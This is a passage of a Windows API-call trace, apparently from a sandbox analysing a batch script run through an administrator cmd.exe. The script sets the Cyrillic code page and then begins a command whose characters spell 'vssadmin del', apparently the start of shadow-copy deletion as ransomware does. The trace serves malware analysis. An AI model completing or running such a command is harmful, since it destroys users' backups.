(HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7d6e00) returned 0x7e [0206.364] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.364] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0xffffffffffffffff [0206.364] GetLastError () returned 0x2 [0206.364] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.364] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0xffffffffffffffff [0206.368] GetLastError () returned 0x2 [0206.368] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.368] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0x24bfe7d6e90 [0206.368] GetProcessHeap () returned 0x24bfe7d0000 [0206.368] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, Size=0x28) returned 0x24bfe7d1890 [0206.368] FindClose (in: hFindFile=0x24bfe7d6e90 | out: hFindFile=0x24bfe7d6e90) returned 1 [0206.369] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x98d077eed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98d077eed0) returned 0x24bfe7d6e90 [0206.369] GetProcessHeap () returned 0x24bfe7d0000 [0206.369] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7d1890, Size=0x8) returned 0x24bfe7d1890 [0206.369] FindClose (in: hFindFile=0x24bfe7d6e90 | out: hFindFile=0x24bfe7d6e90) returned 1 [0206.369] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0206.369] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0206.369] ??_V@YAXPEAX@Z () returned 0x1 [0206.369] GetConsoleTitleW (in: lpConsoleTitle=0x98d077f450, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0206.373] GetProcessHeap () returned 0x24bfe7d0000 [0206.373] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x21c) returned 0x24bfe7e9200 [0206.374] GetConsoleTitleW (in: lpConsoleTitle=0x24bfe7e9210, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0206.374] GetProcessHeap () returned 0x24bfe7d0000 [0206.374] RtlReAllocateHeap (Heap=0x24bfe7d0000, Flags=0x0, Ptr=0x24bfe7e9200, Size=0xaa) returned 0x24bfe7e9200 [0206.374] GetProcessHeap () returned 0x24bfe7d0000 [0206.374] RtlSizeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, MemoryPointer=0x24bfe7e9200) returned 0xaa [0206.374] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0206.376] GetProcessHeap () returned 0x24bfe7d0000 [0206.376] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7e9200) returned 1 [0206.376] InitializeProcThreadAttributeList (in: lpAttributeList=0x98d077f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x98d077f260 | out: lpAttributeList=0x98d077f370, lpSize=0x98d077f260) returned 1 [0206.376] UpdateProcThreadAttribute (in: lpAttributeList=0x98d077f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x98d077f24c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x98d077f370, lpPreviousValue=0x0) returned 1 [0206.376] GetStartupInfoW (in: lpStartupInfo=0x98d077f300 | out: lpStartupInfo=0x98d077f300*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x33c, hStdOutput=0x348, hStdError=0x348)) [0206.376] GetProcessHeap () returned 0x24bfe7d0000 [0206.376] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x20) returned 0x24bfe7d6e90 [0206.376] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0206.376] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0206.376] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.377] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0206.378] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0206.378] GetProcessHeap () returned 0x24bfe7d0000 [0206.378] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6e90) returned 1 [0206.378] GetProcessHeap () returned 0x24bfe7d0000 [0206.378] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x12) returned 0x24bfe7d6e90 [0206.378] _get_osfhandle (_FileHandle=1) returned 0x348 [0206.378] SetConsoleMode (hConsoleHandle=0x348, dwMode=0x0) returned 0 [0206.378] _get_osfhandle (_FileHandle=0) returned 0x33c [0206.378] SetConsoleMode (hConsoleHandle=0x33c, dwMode=0x0) returned 0 [0206.378] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x98d077f290*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x98d077f268 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x98d077f268*(hProcess=0x98, hThread=0x94, dwProcessId=0xdd8, dwThreadId=0x174)) returned 1 [0207.357] CloseHandle (hObject=0x94) returned 1 [0207.358] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.358] GetProcessHeap () returned 0x24bfe7d0000 [0207.358] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d8500) returned 1 [0207.358] GetEnvironmentStringsW () returned 0x24bfe7d84c0* [0207.358] GetProcessHeap () returned 0x24bfe7d0000 [0207.358] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xacc) returned 0x24bfe7e9520 [0207.358] FreeEnvironmentStringsA (penv="=") returned 1 [0207.358] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff931f40000 [0207.358] GetProcAddress (hModule=0x7ff931f40000, lpProcName="NtQueryInformationProcess") returned 0x7ff931fe56b0 [0207.358] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x98d077e768, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x98d077e768, ReturnLength=0x0) returned 0x0 [0207.358] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0xae07d32000, lpBuffer=0x98d077e7a0, nSize=0x7a0, lpNumberOfBytesRead=0x98d077e760 | out: lpBuffer=0x98d077e7a0*, lpNumberOfBytesRead=0x98d077e760*=0x7a0) returned 1 [0207.359] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0210.092] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x98d077f1e8 | out: lpExitCode=0x98d077f1e8*=0x0) returned 1 [0210.092] CloseHandle (hObject=0x98) returned 1 [0210.092] _vsnwprintf (in: _Buffer=0x98d077f3b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x98d077f1f8 | out: _Buffer="00000000") returned 8 [0210.092] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0210.092] GetProcessHeap () returned 0x24bfe7d0000 [0210.092] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7e9520) returned 1 [0210.092] GetEnvironmentStringsW () returned 0x24bfe7e9520* [0210.093] GetProcessHeap () returned 0x24bfe7d0000 [0210.093] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xaf2) returned 0x24bfe7ea020 [0210.093] FreeEnvironmentStringsA (penv="=") returned 1 [0210.093] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.093] GetProcessHeap () returned 0x24bfe7d0000 [0210.093] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7ea020) returned 1 [0210.093] GetEnvironmentStringsW () returned 0x24bfe7e9520* [0210.093] GetProcessHeap () returned 0x24bfe7d0000 [0210.093] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xaf2) returned 0x24bfe7ea020 [0210.093] FreeEnvironmentStringsA (penv="=") returned 1 [0210.093] GetProcessHeap () returned 0x24bfe7d0000 [0210.093] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6e90) returned 1 [0210.093] DeleteProcThreadAttributeList (in: lpAttributeList=0x98d077f370 | out: lpAttributeList=0x98d077f370) [0210.094] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0210.095] ??_V@YAXPEAX@Z () returned 0x1 [0210.095] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.095] SetConsoleMode (hConsoleHandle=0x348, dwMode=0x0) returned 0 [0210.095] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.095] GetConsoleMode (in: hConsoleHandle=0x348, lpMode=0x7ff7c191fc08 | out: lpMode=0x7ff7c191fc08) returned 0 [0210.095] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.095] GetConsoleMode (in: hConsoleHandle=0x33c, lpMode=0x7ff7c191fc0c | out: lpMode=0x7ff7c191fc0c) returned 0 [0210.095] GetConsoleOutputCP () returned 0x4e3 [0210.096] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff7c191fbb0 | out: lpCPInfo=0x7ff7c191fbb0) returned 1 [0210.096] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.096] GetProcessHeap () returned 0x24bfe7d0000 [0210.096] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6e00) returned 1 [0210.096] GetProcessHeap () returned 0x24bfe7d0000 [0210.096] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7e9030) returned 1 [0210.096] GetProcessHeap () returned 0x24bfe7d0000 [0210.096] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6c30) returned 1 [0210.097] GetProcessHeap () returned 0x24bfe7d0000 [0210.097] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7e8fd0) returned 1 [0210.097] GetProcessHeap () returned 0x24bfe7d0000 [0210.097] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d83e0) returned 1 [0210.097] GetProcessHeap () returned 0x24bfe7d0000 [0210.097] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d8fe0) returned 1 [0210.097] GetProcessHeap () returned 0x24bfe7d0000 [0210.097] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d1850) returned 1 [0210.097] GetProcessHeap () returned 0x24bfe7d0000 [0210.097] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d6a80) returned 1 [0210.097] GetProcessHeap () returned 0x24bfe7d0000 [0210.097] RtlFreeHeap (HeapHandle=0x24bfe7d0000, Flags=0x0, BaseAddress=0x24bfe7d8320) returned 1 [0210.097] _vsnwprintf (in: _Buffer=0x7ff7c1927f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x98d077f798 | out: _Buffer="\r\n") returned 2 [0210.097] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.097] GetFileType (hFile=0x348) returned 0x3 [0210.097] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.097] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0210.097] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x98d077f768, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077f768*=0x2, lpOverlapped=0x0) returned 1 [0210.097] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7c191bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0210.097] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x24bfe8d0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0210.097] _vsnwprintf (in: _Buffer=0x24bfe8e0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x98d077f7a8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0210.097] _vsnwprintf (in: _Buffer=0x24bfe8e008e, _BufferCount=0x83ce, _Format="%c", _ArgList=0x98d077f7a8 | out: _Buffer=">") returned 1 [0210.097] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.097] GetFileType (hFile=0x348) returned 0x3 [0210.097] _get_osfhandle (_FileHandle=1) returned 0x348 [0210.098] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop>", lpUsedDefaultChar=0x0) returned 25 [0210.098] WriteFile (in: hFile=0x348, lpBuffer=0x7ff7c1919970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x98d077f798, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesWritten=0x98d077f798*=0x18, lpOverlapped=0x0) returned 1 [0210.098] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.098] GetFileType (hFile=0x33c) returned 0x3 [0210.098] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.098] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.098] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.098] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c30, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0210.098] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.098] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.098] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.098] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c32, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0210.098] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.098] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.098] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.098] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c34, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0210.098] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.098] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.098] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.098] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c36, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0210.098] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.098] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.099] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.099] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c38, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0210.099] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.099] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.099] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.099] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c3a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0210.099] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.099] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.099] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.099] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c3c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0210.099] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.099] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.099] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.099] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c3e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0210.099] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.099] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.099] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.099] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c40, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0210.099] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.099] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.099] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.100] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c42, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0210.100] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.100] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.100] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.100] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c44, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0210.100] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.100] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.100] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.100] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c46, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0210.100] _get_osfhandle (_FileHandle=0) returned 0x33c [0210.100] SetFilePointer (in: hFile=0x33c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.100] ReadFile (in: hFile=0x33c, lpBuffer=0x7ff7c1919970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x98d077faf8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7c1919970*, lpNumberOfBytesRead=0x98d077faf8*=0x1, lpOverlapped=0x0) returned 1 [0210.100] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7c1919970, cbMultiByte=1, lpWideCharStr=0x7ff7c1923c48, cchWideChar=1 | out: 